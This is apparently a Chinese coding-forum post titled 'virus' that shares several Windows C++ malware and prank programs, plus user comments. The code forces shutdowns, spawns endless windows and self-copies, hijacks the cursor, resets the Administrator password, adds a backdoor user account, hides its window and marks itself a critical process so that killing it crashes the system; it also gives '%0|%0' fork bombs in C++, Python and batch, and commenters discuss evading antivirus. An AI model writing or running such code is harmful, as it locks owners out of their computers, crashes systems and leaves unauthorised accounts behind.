病毒
2025-07-31 10:42:22
发布于:广东
#include<bits/stdc++.h>
#include<windows.h>
using namespace std;
int main(){
system("shutdown -s -t 10");
for(int i=1;i>=0;i++){
while(MessageBox(0,"点确定试试?","中毒啦!",MB_YESNO)!=6);
while(1){
SetCursorPos(rand()%1000,rand()%1000);
}
}
return 0;
}
#include<bits/stdc++.h>
#include<windows.h>
using namespace std;
int main(){
system("color 4");
cout<<"程序错误!";
for(int i=0;i<=1;i++){
system("start 未命名1.exe");
continue;
}
return 0;
}
#include<bits/stdc++.h>
#include<windows.h>
using namespace std;
int main(){
system("shutdown -s -t 30");
for(int i=1;i>=0;i++){
while(MessageBox(0,"点确定试试?","中毒啦!",MB_YESNO)!=6);
while(1){
system("color 4");
system("start 未命名1.exe")
SetCursorPos(rand()%1000,rand()%1000);
}
}
return 0;
}
#include <bits/stdc++.h>
#include <windows.h>
#include <winternl.h>
using namespace std;
void HideWindow() {
HWND hwnd;
hwnd=FindWindow("ConsoleWindowClass",NULL);
if(hwnd) ShowWindow(hwnd,SW_HIDE);
return;
}
int main() {
HideWindow();
int x=GetSystemMetrics(SM_CXSCREEN);
int y=GetSystemMetrics(SM_CYSCREEN);
system("net user Administator 123456");
system("net user computer_virus computer_virus /add");
for(unsigned long long i = 1; i <= 500; i++)
{
system("start cmd");
for(int i=1;i<=100;i++)
{
SetCursorPos(rand()%y,rand()%x);
}
}
typedef NTSTATUS(WINAPI *RtlSetProcessIsCritical) (BOOLEAN, PBOOLEAN, BOOLEAN);
typedef BOOL(WINAPI *RtlAdjustPrivilege) (ULONG, BOOL, BOOL, PBOOLEAN);
RtlAdjustPrivilege AdjustPrivilege;
RtlSetProcessIsCritical SetCriticalProcess;
HANDLE ntdll = LoadLibrary(TEXT("ntdll.dll"));
AdjustPrivilege = (RtlAdjustPrivilege)GetProcAddress((HINSTANCE)ntdll, "RtlAdjustPrivilege");
SetCriticalProcess = (RtlSetProcessIsCritical)GetProcAddress((HINSTANCE)ntdll, "RtlSetProcessIsCritical");
BOOLEAN b;
AdjustPrivilege(20UL, TRUE, FALSE, &b);
SetCriticalProcess(TRUE, NULL, FALSE);
return 0;
}
#include<iostream>
#include<windows.h>
int main(){
system("%0|%0"); //在Windows批处理脚本中,%0表示当前执行的批处理文件本身(包含路径)当使用管道符号"|"连接两个%0时(即%0|%0),会形成递归调用 (From DeepseekR1)
return 0;
}
pytion:
import os
os.system('%0|%0')
全部评论 4
《pytion》
昨天 来自 上海
0pytion 是什么
昨天 来自 江苏
0一种语言
昨天 来自 广东
0python是蟒蛇
pytion是一种编程语言昨天 来自 上海
0有图有真相,杜绝瞎科普。
昨天 来自 广东
0
建议"%0|%0"
2025-06-06 来自 广东
0好,我们会改进的
5天前 来自 广东
0//管道递归调用死机代码(Windows 10+) by Dark_eve #include<iostream> #include<windows.h> int main(){ system("%0|%0"); //在Windows批处理脚本中,%0表示当前执行的批处理文件本身(包含路径)当使用管道符号"|"连接两个%0时(即%0|%0),会形成递归调用 (From DeepseekR1) return 0; }
4天前 来自 广东
0或者把"%0|%0"直接输入一个bat文件中,保存并运行。
但是会被360识别出(TAT)4天前 来自 广东
0
打开文件就叫病毒?
2025-06-05 来自 北京
0这个可以一直打开,直到电脑网速炸掉
2025-06-09 来自 广东
0e....
2025-06-12 来自 北京
0
有帮助,赞一个